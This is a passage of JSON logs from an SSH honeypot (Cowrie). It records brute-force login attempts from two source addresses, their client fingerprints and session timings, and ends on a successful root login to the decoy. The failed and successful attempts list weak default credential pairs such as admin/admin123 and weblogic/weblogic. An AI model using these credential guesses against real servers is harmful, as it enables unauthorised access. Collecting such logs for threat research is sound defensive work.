an-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:24.968315Z","src_ip":"212.227.235.229","session":"ce2fb3d53704"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:25.300348Z","src_ip":"212.227.235.229","session":"85309a2a8b59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34476,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ff725695ed","protocol":"ssh","message":"New connection: 212.227.125.160:34476 (1.2.3.4:22) [session: 28ff725695ed]","sensor":"my-vps","timestamp":"2025-08-31T04:42:25.569940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.131669Z","src_ip":"212.227.125.160","session":"28ff725695ed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.132354Z","src_ip":"212.227.125.160","session":"28ff725695ed"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.557032Z","src_ip":"212.227.235.229","session":"85309a2a8b59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36464,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dc97a8052d3","protocol":"ssh","message":"New connection: 212.227.125.160:36464 (1.2.3.4:22) [session: 3dc97a8052d3]","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.591851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.592484Z","src_ip":"212.227.125.160","session":"3dc97a8052d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:26.781135Z","src_ip":"212.227.125.160","session":"3dc97a8052d3"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:27.348997Z","src_ip":"212.227.125.160","session":"3dc97a8052d3"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345678","message":"login attempt [postgres/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:28.055783Z","src_ip":"212.227.125.160","session":"28ff725695ed"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:28.535542Z","src_ip":"212.227.235.229","session":"4c75c57c4742"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:28.539582Z","src_ip":"212.227.125.160","session":"3dc97a8052d3"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:29.570080Z","src_ip":"212.227.125.160","session":"28ff725695ed"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:30.337119Z","src_ip":"212.227.235.229","session":"d80ef083106a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:30.382122Z","src_ip":"212.227.235.229","session":"d80ef083106a"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:33.009763Z","src_ip":"212.227.235.229","session":"ce2fb3d53704"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37438,"dst_ip":"1.2.3.4","dst_port":22,"session":"75abd9754c58","protocol":"ssh","message":"New connection: 212.227.235.229:37438 (1.2.3.4:22) [session: 75abd9754c58]","sensor":"my-vps","timestamp":"2025-08-31T04:42:34.038265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:34.039241Z","src_ip":"212.227.235.229","session":"75abd9754c58"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:34.847371Z","src_ip":"212.227.235.229","session":"ce2fb3d53704"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:35.985806Z","src_ip":"212.227.235.229","session":"75abd9754c58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48030,"dst_ip":"1.2.3.4","dst_port":22,"session":"678239042d23","protocol":"ssh","message":"New connection: 212.227.125.160:48030 (1.2.3.4:22) [session: 678239042d23]","sensor":"my-vps","timestamp":"2025-08-31T04:42:37.332768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:37.333699Z","src_ip":"212.227.125.160","session":"678239042d23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:37.525172Z","src_ip":"212.227.125.160","session":"678239042d23"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:38.106361Z","src_ip":"212.227.125.160","session":"678239042d23"}
{"eventid":"cowrie.session.closed","duration":31.64483642578125,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:38.313986Z","src_ip":"212.227.125.160","session":"2caa0588affa"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:39.300468Z","src_ip":"212.227.125.160","session":"678239042d23"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:39.541388Z","src_ip":"212.227.235.229","session":"75abd9754c58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48070,"dst_ip":"1.2.3.4","dst_port":22,"session":"d225cd3cbae4","protocol":"ssh","message":"New connection: 212.227.125.160:48070 (1.2.3.4:22) [session: d225cd3cbae4]","sensor":"my-vps","timestamp":"2025-08-31T04:42:42.761367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:42.762356Z","src_ip":"212.227.125.160","session":"d225cd3cbae4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:42.951752Z","src_ip":"212.227.125.160","session":"d225cd3cbae4"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:43.520138Z","src_ip":"212.227.125.160","session":"d225cd3cbae4"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:44.026251Z","src_ip":"212.227.235.229","session":"75abd9754c58"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:44.710842Z","src_ip":"212.227.125.160","session":"d225cd3cbae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32820,"dst_ip":"1.2.3.4","dst_port":22,"session":"03fcee5435c9","protocol":"ssh","message":"New connection: 212.227.235.229:32820 (1.2.3.4:22) [session: 03fcee5435c9]","sensor":"my-vps","timestamp":"2025-08-31T04:42:45.040551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:45.058177Z","src_ip":"212.227.235.229","session":"03fcee5435c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:45.299318Z","src_ip":"212.227.235.229","session":"03fcee5435c9"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:46.773916Z","src_ip":"212.227.125.160","session":"76172e19d8be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53936,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8b3ae4539d9","protocol":"ssh","message":"New connection: 212.227.125.160:53936 (1.2.3.4:22) [session: d8b3ae4539d9]","sensor":"my-vps","timestamp":"2025-08-31T04:42:48.021441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:48.022521Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:48.205221Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:48.751346Z","src_ip":"212.227.235.229","session":"03fcee5435c9"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:42:48.755064Z","src_ip":"212.227.125.160","session":"d8b3ae4539d9"}
